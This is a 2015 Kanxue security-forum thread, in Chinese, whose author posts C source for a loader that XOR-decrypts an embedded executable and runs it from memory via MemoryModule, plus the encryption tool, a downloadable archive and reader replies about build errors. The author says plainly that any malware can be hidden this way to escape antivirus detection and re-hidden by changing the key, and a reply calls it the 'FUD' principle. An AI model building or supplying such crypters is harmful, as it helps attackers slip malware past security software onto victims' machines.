[原创]支持64位系统的XOR加密后内存加载PE绕过杀毒软件-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]支持64位系统的XOR加密后内存加载PE绕过杀毒软件

发表于: 2015-9-25 10:54 10523

[原创]支持64位系统的XOR加密后内存加载PE绕过杀毒软件

子曰R

2015-9-25 10:54

10523

http://bbs.pediy.com/showthread.php?t=203910
绝对自动支持32、64位的内存加载源码

无聊逛看雪时，看到了这个。
然后到github上找到了源。就是这里：https://github.com/fancycode/MemoryModule

结合我几年前写的一个利用方法：https://github.com/eric21/MemPE

使用方法超级简单：

#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <malloc.h>
#include "MemoryModule.h"
#include "res\a.h"
////////////////////////////////////////////////////////////////////////////

int RunForAarray(void)
{
  HMEMORYMODULE handle;
  int result = -1;
  for (int i = 0; i < sizeof(aArray); i++)
  {
    //szArray = ~ szArray; // 取反 ~
    aArray = aArray ^ 123; // 异或 ^
  }
  handle = MemoryLoadLibrary(aArray);
  if (handle == NULL)
  {
    //_tprintf(_T("Can't load library from memory.\n"));
    goto exit;
  }
  result = MemoryCallEntryPoint(handle);
  if (result < 0) {
    //_tprintf(_T("Could not execute entry point: %d\n"), result);
  }
  MemoryFreeLibrary(handle);

exit:
  if (aArray)
    free(aArray);
  return result;
}
int main(int argc, char* argv[])
{
    return RunForAarray();
}

res目录下a.h文件生成方法：EncryptFile.exe 1.exe a.h aArray 123

生成的加密key和loader的解密key一致即可，这里演示用，均为123

理论上可以通过异或加密后将任意malware保存在loader内，不会被安全软件查杀，解密后加载内存，不会产生文件，只要更换加密key，就可以实现再次免杀。

注意：过不了主动防御。

重要声明：此文章仅供学习交流，请勿用于非法用途！
支持64位系统的XOR加密后内存加载PE绕过杀毒软件.rar

不知道还有多少人记得我，已经离开安全圈子很多年了，
偶尔回来看看，发现很多人依然在坚持，让我十分佩服。
喜欢研究Malware的同好可以联系我 http://www.eric21.com/about

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

最后于 2019-9-15 14:30 被kanxue编辑，原因：

上传的附件：

支持64位系统的XOR加密后内存加载PE绕过杀毒软件.rar （46.06kb，417次下载）

收藏・26

免费・3

支持

最新回复 (12)
北海情书雪币： 3 活跃值： (13) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 9 粉丝 0 关注私信	北海情书 2 楼支持楼主 2015-9-25 11:17 0
值得怀疑雪币： 2305 活跃值： (4554) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 356 粉丝 0 关注私信	值得怀疑 3 楼 a.h生产失败!! EncryptFile 异常！！ 2015-9-25 11:30 0
lynnux 雪币： 3330 活跃值： (1662) 能力值： ( LV6，RANK：93 ) 在线值：发帖 25 回帖 382 粉丝 15 关注私信	lynnux 4 楼楼主莫非也在那个NDIS群？ 2015-9-25 11:49 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 5 楼哈哈哈，我的群都是玩cosplay的小姑娘们的群，和网游认识的朋友的群。 2015-9-25 12:07 0
ID蝴蝶雪币： 438 活跃值： (228) 能力值： ( LV5，RANK：70 ) 在线值：发帖 11 回帖 279 粉丝 0 关注私信	ID蝴蝶 1 6 楼点开才发现，最后一个链接跟malware有联系吗？ 2015-9-25 13:33 0
guotouck 雪币： 35 活跃值： (612) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 153 粉丝 1 关注私信	guotouck 7 楼楼主你的内存注入不支持 MFC DLL啊测试了WIN32 DLL 可以正常使用；但MFC DLL 就错误 2015-9-25 20:30 0
轩野雪币： 958 活跃值： (169) 能力值： ( LV4，RANK：50 ) 在线值：发帖 1 回帖 48 粉丝 1 关注私信	轩野 1 8 楼用不了，直接报错EncryptFile 崩了 2015-9-27 00:37 0
cvcvxk 雪币： 8865 活跃值： (2379) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 233 关注私信	cvcvxk 10 9 楼确实XOR一下PE,然后自己加载时解密可以绕过很多XX~ 这个技术就是老外常说的那个什么FUD的原理~ 2015-9-27 05:45 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 10 楼 EncryptFile不能用的同学看这里，它也是开源的。 https://github.com/eric21/EncryptFile 2015-9-27 09:27 0
dayang 雪币： 220 活跃值： (701) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 934 粉丝 1 关注私信	dayang 11 楼 EncryptFile没出错,不错编译出来的程序,运行出错了,, 2018-4-26 10:20 0
gabpfiugdu 雪币： 89 活跃值： (23) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 24 粉丝 0 关注私信	gabpfiugdu 12 楼 dayang EncryptFile没出错,不错编译出来的程序,运行出错了,, 我也是 2018-5-7 07:55 0
人在塔在雪币： 144 活跃值： (335) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 391 粉丝 3 关注私信	人在塔在 13 楼就是memload dll么。。。 2018-5-7 09:17 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

子曰R

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (12)
北海情书雪币： 3 活跃值： (13) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 9 粉丝 0 关注私信	北海情书 2 楼支持楼主 2015-9-25 11:17 0
值得怀疑雪币： 2305 活跃值： (4554) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 356 粉丝 0 关注私信	值得怀疑 3 楼 a.h生产失败!! EncryptFile 异常！！ 2015-9-25 11:30 0
lynnux 雪币： 3330 活跃值： (1662) 能力值： ( LV6，RANK：93 ) 在线值：发帖 25 回帖 382 粉丝 15 关注私信	lynnux 4 楼楼主莫非也在那个NDIS群？ 2015-9-25 11:49 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 5 楼哈哈哈，我的群都是玩cosplay的小姑娘们的群，和网游认识的朋友的群。 2015-9-25 12:07 0
ID蝴蝶雪币： 438 活跃值： (228) 能力值： ( LV5，RANK：70 ) 在线值：发帖 11 回帖 279 粉丝 0 关注私信	ID蝴蝶 1 6 楼点开才发现，最后一个链接跟malware有联系吗？ 2015-9-25 13:33 0
guotouck 雪币： 35 活跃值： (612) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 153 粉丝 1 关注私信	guotouck 7 楼楼主你的内存注入不支持 MFC DLL啊测试了WIN32 DLL 可以正常使用；但MFC DLL 就错误 2015-9-25 20:30 0
轩野雪币： 958 活跃值： (169) 能力值： ( LV4，RANK：50 ) 在线值：发帖 1 回帖 48 粉丝 1 关注私信	轩野 1 8 楼用不了，直接报错EncryptFile 崩了 2015-9-27 00:37 0
cvcvxk 雪币： 8865 活跃值： (2379) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 233 关注私信	cvcvxk 10 9 楼确实XOR一下PE,然后自己加载时解密可以绕过很多XX~ 这个技术就是老外常说的那个什么FUD的原理~ 2015-9-27 05:45 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 10 楼 EncryptFile不能用的同学看这里，它也是开源的。 https://github.com/eric21/EncryptFile 2015-9-27 09:27 0
dayang 雪币： 220 活跃值： (701) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 934 粉丝 1 关注私信	dayang 11 楼 EncryptFile没出错,不错编译出来的程序,运行出错了,, 2018-4-26 10:20 0
gabpfiugdu 雪币： 89 活跃值： (23) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 24 粉丝 0 关注私信	gabpfiugdu 12 楼 dayang EncryptFile没出错,不错编译出来的程序,运行出错了,, 我也是 2018-5-7 07:55 0
人在塔在雪币： 144 活跃值： (335) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 391 粉丝 3 关注私信	人在塔在 13 楼就是memload dll么。。。 2018-5-7 09:17 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复